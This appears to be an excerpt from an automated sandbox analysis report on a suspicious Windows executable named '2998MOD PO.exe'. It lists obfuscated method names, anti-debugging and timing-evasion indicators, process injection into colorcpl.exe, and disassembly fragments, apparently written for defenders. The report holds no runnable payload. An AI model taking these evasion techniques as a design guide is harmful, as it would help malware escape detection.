                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, yoC8k9AGeE8sgPPbwXA.cs | High entropy of concatenated method names: 'QDlmS25Jsq', 'JYumnoZws9', 'poYmr8lGNv', 'IRUm0MaH8k', 'pvUm4ThjHS', 'IMhm2R26Kr', 'NwxmdRDWpi', 'PvWmWnCle1', 'mmhmN6vLPA', 'XtmmF9qsUT'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, WnrTXVbngDZ3l5EyUi.cs | High entropy of concatenated method names: 'C6qsvkEMuJ', 'sU8sZI8ecH', 'vk6sxtLQGc', 'a9QxCfCQsl', 'fyhxzvp9QX', 'TCPsG20i6S', 'BYFsAYwXGd', 'NgnsVYGuNv', 'qbdsqKWHQJ', 'oT5sY5xSq0'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, GuVZeiWWGgyIsVPOZB.cs | High entropy of concatenated method names: 'hF7HJBiPwH', 'j1YHMI118Y', 'ce1Hc5DkQT', 'E0WH8cGuox', 'V0eHhT1jbp', 'weGHyuOcHq', 'qAaH5aie6X', 'x1wHT8S8cr', 'tXoHKdV8qc', 'XUnHCkddwl'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, J8YJ6nCparoCklRBhk.cs | High entropy of concatenated method names: 'OdemAsdVH6', 'dekmq8MPrV', 'bsEmYZtRU9', 'TqKmvaDUWB', 'aoRmHfCoyo', 'tGZmRf2hbN', 'KhymxNdQfB', 'fsyQ55L4Yg', 'FRSQTxesBd', 'QrwQKl5Wh6'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, e6csmyNd1AuCqsOHuU.cs | High entropy of concatenated method names: 'Re7Z0N6w07', 'UClZ2UkCZs', 'tOIZW0hHJL', 'hGAZNw4gA5', 'RUQZ1vdC3o', 'lLoZuloGso', 'DllZ3mHlmy', 'nWaZQemowf', 'dPVZmZW54H', 'JywZa10SRi'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, R92djQEdSh5jkUnu7Y.cs | High entropy of concatenated method names: 'RFgsSkmWxD', 'hyYsnyxpcB', 'qassrl3ws5', 'wv0s047Uua', 'vTQs4muanQ', 'tXTs2Ngl5D', 'Q5psd8PDBQ', 'e2HsWqv4Km', 'BdQsNFIthg', 'sDXsFP8oZ4'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, ajX7SvKstbl4V0tKAe.cs | High entropy of concatenated method names: 'rLcQ7qDm4V', 'MS1QUtK6OX', 'raVQDPtmsg', 'Oc7Q9yZraa', 'pSaQJmcfJD', 'g4kQBFGvtw', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, dBKwEy8HgOOo4pITZv.cs | High entropy of concatenated method names: 'Mw23oEYFvY', 'B053t70mF7', 'ToString', 'OD43vQRfgJ', 'Avv3HRtxVQ', 'p9d3ZkxhMN', 'V2s3RMS0bh', 'aef3xgUBxo', 'lYS3s06pnc', 'HXY3Pk76dN'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, kQ6WtiAqcS5W9tw0Oxs.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O7DaJuaw7A', 'tgIaMIOEAV', 'rt9acop79a', 'iUMa8VqfaN', 'N0nahGgG28', 'rh4ayENCgB', 'Udxa5rcUTJ'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, tFIMTA79oCEVXEbenh.cs | High entropy of concatenated method names: 'XUTxjK4Woj', 'VVQxHQvYJj', 'WgaxRYJcfy', 'FJbxs3fpwa', 'BwCxPkC0U5', 'Jy2RhO9jMZ', 'ATERypmftS', 'i2cR5upHoM', 'acqRTWjaiw', 'PwPRKJQw9W'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, xdVRuwVnxyYCMZQs8n.cs | High entropy of concatenated method names: 'O5krvD0OT', 'eQO0C377x', 'H1Y25QDcO', 'L3QdwFmTE', 'NZrNynmGt', 'YxOFxuSMM', 'jOOjjlZu3PLatRliU8', 'V58a8IE0CyRCCoJ09h', 'KOdQtuFon', 'K4gamTItu'
                Source: 0.2.2998MOD PO.exe.b5a0000.3.raw.unpack, xKPA6QYeUQDw6KZEyv.cs | High entropy of concatenated method names: 'YIUAsuVZei', 'DGgAPyIsVP', 'Vd1AoAuCqs', 'MHuAtUCx0G', 'NP5A1i8fFI', 'RTAAu9oCEV', 'n6gmfh5pChGwbgX4pJ', 'jNpIZ2vXCOO8H7Z3o3', 'A1XAA6Ty1v', 'euMAqjvVIi'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, Yx0GApFkpsOyylP5i8.cs | High entropy of concatenated method names: 'sA2R4ibK34', 'tv1RdkLVgM', 'UXFZDEmtjX', 'URKZ9A06Jg', 'aTiZBUJliv', 'BrRZIM0HI6', 'ejrZb5ZtQ6', 'TWYZO2LRhh', 'EDUZENVdrs', 'l2DZl7rByE'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, BD0tkRyW0NvFS0Kras.cs | High entropy of concatenated method names: 'Ldk3TZ8LQs', 'Dkv3CBQhnb', 'DyfQG8jBBo', 'PJmQAD6PDC', 't5n3LrI8fd', 'BZx3kIeIjZ', 'g0p3gxV9LY', 'pos3JUwNWA', 'lOf3MhhA8g', 'n863cqGgXV'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, hxQAyEPkVUnir0mqK7.cs | High entropy of concatenated method names: 'vcsqj7bqfr', 'uivqv0brPO', 'EwBqH4B36e', 'mjVqZOHhgv', 'qfjqRfwDJk', 'e1Bqxm6JNa', 'nMXqssQLgD', 'nFlqPxrWg1', 'MjlqpYj8Tn', 'CHGqol9Spy'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, f6ijMJHORTQRhNugqL.cs | High entropy of concatenated method names: 'Dispose', 'g9WAKlRnb6', 'XhqVUeR2BV', 'U9vGGhuAMq', 'PPyACj87Kr', 'FScAzneM7v', 'ProcessDialogKey', 'C6GVGjX7Sv', 'jtbVAl4V0t', 'XAeVVB8YJ6'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, WLiWCAcvwIfxDKCaWi.cs | High entropy of concatenated method names: 'ToString', 'igQuLDVyDD', 'kdruUNml9f', 'xjauDtEpHq', 'EgLu93fV1P', 'GCluBUKZmZ', 'oQWuIq4dmV', 'QUhubWyBrw', 'FYWuOUYrsX', 'E4wuEOltyO'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, kyj87KTr7ScneM7v26.cs | High entropy of concatenated method names: 'plCQvxEf01', 'XGaQHXS2hu', 'hm3QZypwaZ', 'aAWQRpvqbc', 'eCoQxjdrmi', 'k7aQsJqiI1', 'a03QPSwyiq', 'bKfQpHlGwW', 'NlwQoeeV4Q', 'dkPQtIBUFL'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, e7iHOazfdRADLFCyRX.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CbFmeSxOJx', 'wdrm18NP2O', 'WNdmuOfnFQ', 'cs1m38lhVU', 'ceUmQxMkAV', 'PQcmmfOJD5', 'g4emaKE7yJ'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, WMgNXPg2RPSOrhK9eh.cs | High entropy of concatenated method names: 'TjKeW6uuhl', 'JXaeNak938', 'DUfe79wOjP', 'JZBeUGwj6a', 'B8ue90HnLg', 'mOSeBFsg97', 'jdKeb4XNuj', 'fLjeOOlJUe', 'zD1elAbgA7', 'SlBeLQwPAF'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, TWS96jZxAX3EN502gS.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NCLVKjoOGe', 'J3aVC65g2J', 'nKvVzcmJkP', 'UdRqGQQncQ', 'ayMqAQjPUp', 'YyuqVjS1j2', 'lq7qqnsDgr', 'AnP8IBzLo4heWACJmJ'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, yoC8k9AGeE8sgPPbwXA.cs | High entropy of concatenated method names: 'QDlmS25Jsq', 'JYumnoZws9', 'poYmr8lGNv', 'IRUm0MaH8k', 'pvUm4ThjHS', 'IMhm2R26Kr', 'NwxmdRDWpi', 'PvWmWnCle1', 'mmhmN6vLPA', 'XtmmF9qsUT'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, WnrTXVbngDZ3l5EyUi.cs | High entropy of concatenated method names: 'C6qsvkEMuJ', 'sU8sZI8ecH', 'vk6sxtLQGc', 'a9QxCfCQsl', 'fyhxzvp9QX', 'TCPsG20i6S', 'BYFsAYwXGd', 'NgnsVYGuNv', 'qbdsqKWHQJ', 'oT5sY5xSq0'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, GuVZeiWWGgyIsVPOZB.cs | High entropy of concatenated method names: 'hF7HJBiPwH', 'j1YHMI118Y', 'ce1Hc5DkQT', 'E0WH8cGuox', 'V0eHhT1jbp', 'weGHyuOcHq', 'qAaH5aie6X', 'x1wHT8S8cr', 'tXoHKdV8qc', 'XUnHCkddwl'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, J8YJ6nCparoCklRBhk.cs | High entropy of concatenated method names: 'OdemAsdVH6', 'dekmq8MPrV', 'bsEmYZtRU9', 'TqKmvaDUWB', 'aoRmHfCoyo', 'tGZmRf2hbN', 'KhymxNdQfB', 'fsyQ55L4Yg', 'FRSQTxesBd', 'QrwQKl5Wh6'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, e6csmyNd1AuCqsOHuU.cs | High entropy of concatenated method names: 'Re7Z0N6w07', 'UClZ2UkCZs', 'tOIZW0hHJL', 'hGAZNw4gA5', 'RUQZ1vdC3o', 'lLoZuloGso', 'DllZ3mHlmy', 'nWaZQemowf', 'dPVZmZW54H', 'JywZa10SRi'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, R92djQEdSh5jkUnu7Y.cs | High entropy of concatenated method names: 'RFgsSkmWxD', 'hyYsnyxpcB', 'qassrl3ws5', 'wv0s047Uua', 'vTQs4muanQ', 'tXTs2Ngl5D', 'Q5psd8PDBQ', 'e2HsWqv4Km', 'BdQsNFIthg', 'sDXsFP8oZ4'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, ajX7SvKstbl4V0tKAe.cs | High entropy of concatenated method names: 'rLcQ7qDm4V', 'MS1QUtK6OX', 'raVQDPtmsg', 'Oc7Q9yZraa', 'pSaQJmcfJD', 'g4kQBFGvtw', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, dBKwEy8HgOOo4pITZv.cs | High entropy of concatenated method names: 'Mw23oEYFvY', 'B053t70mF7', 'ToString', 'OD43vQRfgJ', 'Avv3HRtxVQ', 'p9d3ZkxhMN', 'V2s3RMS0bh', 'aef3xgUBxo', 'lYS3s06pnc', 'HXY3Pk76dN'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, kQ6WtiAqcS5W9tw0Oxs.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O7DaJuaw7A', 'tgIaMIOEAV', 'rt9acop79a', 'iUMa8VqfaN', 'N0nahGgG28', 'rh4ayENCgB', 'Udxa5rcUTJ'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, tFIMTA79oCEVXEbenh.cs | High entropy of concatenated method names: 'XUTxjK4Woj', 'VVQxHQvYJj', 'WgaxRYJcfy', 'FJbxs3fpwa', 'BwCxPkC0U5', 'Jy2RhO9jMZ', 'ATERypmftS', 'i2cR5upHoM', 'acqRTWjaiw', 'PwPRKJQw9W'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, xdVRuwVnxyYCMZQs8n.cs | High entropy of concatenated method names: 'O5krvD0OT', 'eQO0C377x', 'H1Y25QDcO', 'L3QdwFmTE', 'NZrNynmGt', 'YxOFxuSMM', 'jOOjjlZu3PLatRliU8', 'V58a8IE0CyRCCoJ09h', 'KOdQtuFon', 'K4gamTItu'
                Source: 0.2.2998MOD PO.exe.45df058.0.raw.unpack, xKPA6QYeUQDw6KZEyv.cs | High entropy of concatenated method names: 'YIUAsuVZei', 'DGgAPyIsVP', 'Vd1AoAuCqs', 'MHuAtUCx0G', 'NP5A1i8fFI', 'RTAAu9oCEV', 'n6gmfh5pChGwbgX4pJ', 'jNpIZ2vXCOO8H7Z3o3', 'A1XAA6Ty1v', 'euMAqjvVIi'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, Yx0GApFkpsOyylP5i8.cs | High entropy of concatenated method names: 'sA2R4ibK34', 'tv1RdkLVgM', 'UXFZDEmtjX', 'URKZ9A06Jg', 'aTiZBUJliv', 'BrRZIM0HI6', 'ejrZb5ZtQ6', 'TWYZO2LRhh', 'EDUZENVdrs', 'l2DZl7rByE'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, BD0tkRyW0NvFS0Kras.cs | High entropy of concatenated method names: 'Ldk3TZ8LQs', 'Dkv3CBQhnb', 'DyfQG8jBBo', 'PJmQAD6PDC', 't5n3LrI8fd', 'BZx3kIeIjZ', 'g0p3gxV9LY', 'pos3JUwNWA', 'lOf3MhhA8g', 'n863cqGgXV'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, hxQAyEPkVUnir0mqK7.cs | High entropy of concatenated method names: 'vcsqj7bqfr', 'uivqv0brPO', 'EwBqH4B36e', 'mjVqZOHhgv', 'qfjqRfwDJk', 'e1Bqxm6JNa', 'nMXqssQLgD', 'nFlqPxrWg1', 'MjlqpYj8Tn', 'CHGqol9Spy'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, f6ijMJHORTQRhNugqL.cs | High entropy of concatenated method names: 'Dispose', 'g9WAKlRnb6', 'XhqVUeR2BV', 'U9vGGhuAMq', 'PPyACj87Kr', 'FScAzneM7v', 'ProcessDialogKey', 'C6GVGjX7Sv', 'jtbVAl4V0t', 'XAeVVB8YJ6'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, WLiWCAcvwIfxDKCaWi.cs | High entropy of concatenated method names: 'ToString', 'igQuLDVyDD', 'kdruUNml9f', 'xjauDtEpHq', 'EgLu93fV1P', 'GCluBUKZmZ', 'oQWuIq4dmV', 'QUhubWyBrw', 'FYWuOUYrsX', 'E4wuEOltyO'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, kyj87KTr7ScneM7v26.cs | High entropy of concatenated method names: 'plCQvxEf01', 'XGaQHXS2hu', 'hm3QZypwaZ', 'aAWQRpvqbc', 'eCoQxjdrmi', 'k7aQsJqiI1', 'a03QPSwyiq', 'bKfQpHlGwW', 'NlwQoeeV4Q', 'dkPQtIBUFL'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, e7iHOazfdRADLFCyRX.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CbFmeSxOJx', 'wdrm18NP2O', 'WNdmuOfnFQ', 'cs1m38lhVU', 'ceUmQxMkAV', 'PQcmmfOJD5', 'g4emaKE7yJ'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, WMgNXPg2RPSOrhK9eh.cs | High entropy of concatenated method names: 'TjKeW6uuhl', 'JXaeNak938', 'DUfe79wOjP', 'JZBeUGwj6a', 'B8ue90HnLg', 'mOSeBFsg97', 'jdKeb4XNuj', 'fLjeOOlJUe', 'zD1elAbgA7', 'SlBeLQwPAF'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, TWS96jZxAX3EN502gS.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NCLVKjoOGe', 'J3aVC65g2J', 'nKvVzcmJkP', 'UdRqGQQncQ', 'ayMqAQjPUp', 'YyuqVjS1j2', 'lq7qqnsDgr', 'AnP8IBzLo4heWACJmJ'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, yoC8k9AGeE8sgPPbwXA.cs | High entropy of concatenated method names: 'QDlmS25Jsq', 'JYumnoZws9', 'poYmr8lGNv', 'IRUm0MaH8k', 'pvUm4ThjHS', 'IMhm2R26Kr', 'NwxmdRDWpi', 'PvWmWnCle1', 'mmhmN6vLPA', 'XtmmF9qsUT'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, WnrTXVbngDZ3l5EyUi.cs | High entropy of concatenated method names: 'C6qsvkEMuJ', 'sU8sZI8ecH', 'vk6sxtLQGc', 'a9QxCfCQsl', 'fyhxzvp9QX', 'TCPsG20i6S', 'BYFsAYwXGd', 'NgnsVYGuNv', 'qbdsqKWHQJ', 'oT5sY5xSq0'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, GuVZeiWWGgyIsVPOZB.cs | High entropy of concatenated method names: 'hF7HJBiPwH', 'j1YHMI118Y', 'ce1Hc5DkQT', 'E0WH8cGuox', 'V0eHhT1jbp', 'weGHyuOcHq', 'qAaH5aie6X', 'x1wHT8S8cr', 'tXoHKdV8qc', 'XUnHCkddwl'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, J8YJ6nCparoCklRBhk.cs | High entropy of concatenated method names: 'OdemAsdVH6', 'dekmq8MPrV', 'bsEmYZtRU9', 'TqKmvaDUWB', 'aoRmHfCoyo', 'tGZmRf2hbN', 'KhymxNdQfB', 'fsyQ55L4Yg', 'FRSQTxesBd', 'QrwQKl5Wh6'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, e6csmyNd1AuCqsOHuU.cs | High entropy of concatenated method names: 'Re7Z0N6w07', 'UClZ2UkCZs', 'tOIZW0hHJL', 'hGAZNw4gA5', 'RUQZ1vdC3o', 'lLoZuloGso', 'DllZ3mHlmy', 'nWaZQemowf', 'dPVZmZW54H', 'JywZa10SRi'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, R92djQEdSh5jkUnu7Y.cs | High entropy of concatenated method names: 'RFgsSkmWxD', 'hyYsnyxpcB', 'qassrl3ws5', 'wv0s047Uua', 'vTQs4muanQ', 'tXTs2Ngl5D', 'Q5psd8PDBQ', 'e2HsWqv4Km', 'BdQsNFIthg', 'sDXsFP8oZ4'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, ajX7SvKstbl4V0tKAe.cs | High entropy of concatenated method names: 'rLcQ7qDm4V', 'MS1QUtK6OX', 'raVQDPtmsg', 'Oc7Q9yZraa', 'pSaQJmcfJD', 'g4kQBFGvtw', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, dBKwEy8HgOOo4pITZv.cs | High entropy of concatenated method names: 'Mw23oEYFvY', 'B053t70mF7', 'ToString', 'OD43vQRfgJ', 'Avv3HRtxVQ', 'p9d3ZkxhMN', 'V2s3RMS0bh', 'aef3xgUBxo', 'lYS3s06pnc', 'HXY3Pk76dN'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, kQ6WtiAqcS5W9tw0Oxs.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O7DaJuaw7A', 'tgIaMIOEAV', 'rt9acop79a', 'iUMa8VqfaN', 'N0nahGgG28', 'rh4ayENCgB', 'Udxa5rcUTJ'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, tFIMTA79oCEVXEbenh.cs | High entropy of concatenated method names: 'XUTxjK4Woj', 'VVQxHQvYJj', 'WgaxRYJcfy', 'FJbxs3fpwa', 'BwCxPkC0U5', 'Jy2RhO9jMZ', 'ATERypmftS', 'i2cR5upHoM', 'acqRTWjaiw', 'PwPRKJQw9W'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, xdVRuwVnxyYCMZQs8n.cs | High entropy of concatenated method names: 'O5krvD0OT', 'eQO0C377x', 'H1Y25QDcO', 'L3QdwFmTE', 'NZrNynmGt', 'YxOFxuSMM', 'jOOjjlZu3PLatRliU8', 'V58a8IE0CyRCCoJ09h', 'KOdQtuFon', 'K4gamTItu'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, xKPA6QYeUQDw6KZEyv.cs | High entropy of concatenated method names: 'YIUAsuVZei', 'DGgAPyIsVP', 'Vd1AoAuCqs', 'MHuAtUCx0G', 'NP5A1i8fFI', 'RTAAu9oCEV', 'n6gmfh5pChGwbgX4pJ', 'jNpIZ2vXCOO8H7Z3o3', 'A1XAA6Ty1v', 'euMAqjvVIi'
                Source: C:\Users\user\Desktop\2998MOD PO.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match - File source: Process Memory Space: 2998MOD PO.exe PID: 7332, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\colorcpl.exe - API/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\colorcpl.exe - API/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Memory allocated: 1170000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Memory allocated: 2B10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Memory allocated: 4B10000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Memory allocated: 8CC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Memory allocated: 7540000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Memory allocated: 9CC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Memory allocated: ACC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Memory allocated: B630000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Memory allocated: C630000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Memory allocated: D630000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Code function: 4_2_019C096E rdtsc
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\2998MOD PO.exe - API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\colorcpl.exe - API coverage: 1.6 %
                Source: C:\Users\user\Desktop\2998MOD PO.exe TID: 7352 - Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe TID: 7988 - Thread sleep time: -120000s >= -30000s
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Thread delayed: delay time: 922337203685477
                Source: sePlrCtAXqpc.exe, 00000009.00000002.3562517847.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
                Source: colorcpl.exe, 00000008.00000002.2287863958.0000000002F5D000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ(y
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Process queried: DebugPort
                Source: C:\Windows\SysWOW64\colorcpl.exe - Process queried: DebugPort
                Source: C:\Windows\SysWOW64\colorcpl.exe - Process queried: DebugPort
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Code function: 4_2_019C096E rdtsc
                Source: C:\Users\user\Desktop\2998MOD PO.exe - Code function: 4_2_00417563 LdrLoadDll
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06420 mov eax, dword ptr fs:[00000030h]4_2_01A06420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B8402 mov eax, dword ptr fs:[00000030h]4_2_019B8402
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B8402 mov eax, dword ptr fs:[00000030h]4_2_019B8402
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B8402 mov eax, dword ptr fs:[00000030h]4_2_019B8402
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197C427 mov eax, dword ptr fs:[00000030h]4_2_0197C427
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197E420 mov eax, dword ptr fs:[00000030h]4_2_0197E420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197E420 mov eax, dword ptr fs:[00000030h]4_2_0197E420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197E420 mov eax, dword ptr fs:[00000030h]4_2_0197E420
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A245A mov eax, dword ptr fs:[00000030h]4_2_019A245A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0C460 mov ecx, dword ptr fs:[00000030h]4_2_01A0C460
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197645D mov eax, dword ptr fs:[00000030h]4_2_0197645D
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BE443 mov eax, dword ptr fs:[00000030h]4_2_019BE443
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AA470 mov eax, dword ptr fs:[00000030h]4_2_019AA470
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AA470 mov eax, dword ptr fs:[00000030h]4_2_019AA470
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AA470 mov eax, dword ptr fs:[00000030h]4_2_019AA470
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3A456 mov eax, dword ptr fs:[00000030h]4_2_01A3A456
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A347A0 mov eax, dword ptr fs:[00000030h]4_2_01A347A0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2678E mov eax, dword ptr fs:[00000030h]4_2_01A2678E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019807AF mov eax, dword ptr fs:[00000030h]4_2_019807AF
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0E7E1 mov eax, dword ptr fs:[00000030h]4_2_01A0E7E1
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198C7C0 mov eax, dword ptr fs:[00000030h]4_2_0198C7C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019847FB mov eax, dword ptr fs:[00000030h]4_2_019847FB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019847FB mov eax, dword ptr fs:[00000030h]4_2_019847FB
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A007C3 mov eax, dword ptr fs:[00000030h]4_2_01A007C3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A27ED mov eax, dword ptr fs:[00000030h]4_2_019A27ED
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A27ED mov eax, dword ptr fs:[00000030h]4_2_019A27ED
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A27ED mov eax, dword ptr fs:[00000030h]4_2_019A27ED
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01980710 mov eax, dword ptr fs:[00000030h]4_2_01980710
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B0710 mov eax, dword ptr fs:[00000030h]4_2_019B0710
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019BC700 mov eax, dword ptr fs:[00000030h]4_2_019BC700
